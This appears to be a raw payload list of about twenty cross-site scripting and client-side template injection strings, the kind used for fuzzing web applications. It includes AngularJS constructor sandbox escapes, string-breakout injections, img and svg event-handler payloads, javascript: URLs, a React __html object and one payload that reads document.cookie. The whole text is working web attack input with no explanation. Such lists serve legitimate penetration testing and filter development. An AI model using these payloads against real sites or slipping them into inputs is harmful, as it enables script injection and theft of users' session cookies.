${alert(1)}
{{$on.constructor('alert(1)')()}}
{{7*7}}
'-alert(1)-'
';alert(1)//
{{alert(1)}}
';alert(document.cookie)//
{{_b.constructor('alert(1)')()}}
{{_c.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<div id="test"></div><script>$('#test').html('<img src=x onerror=alert(1)>')</script>
{"__html":"<img src=x onerror=alert(1)>"}
<img src=x onerror=alert(1)>
javascript:alert(1)
javascript:alert(document.domain)
javascript:void(alert(1))
'-prompt(1)-'
<script>document.write('<img src=x onerror=alert(1)>')</script>
<svg/onload=alert(1)>
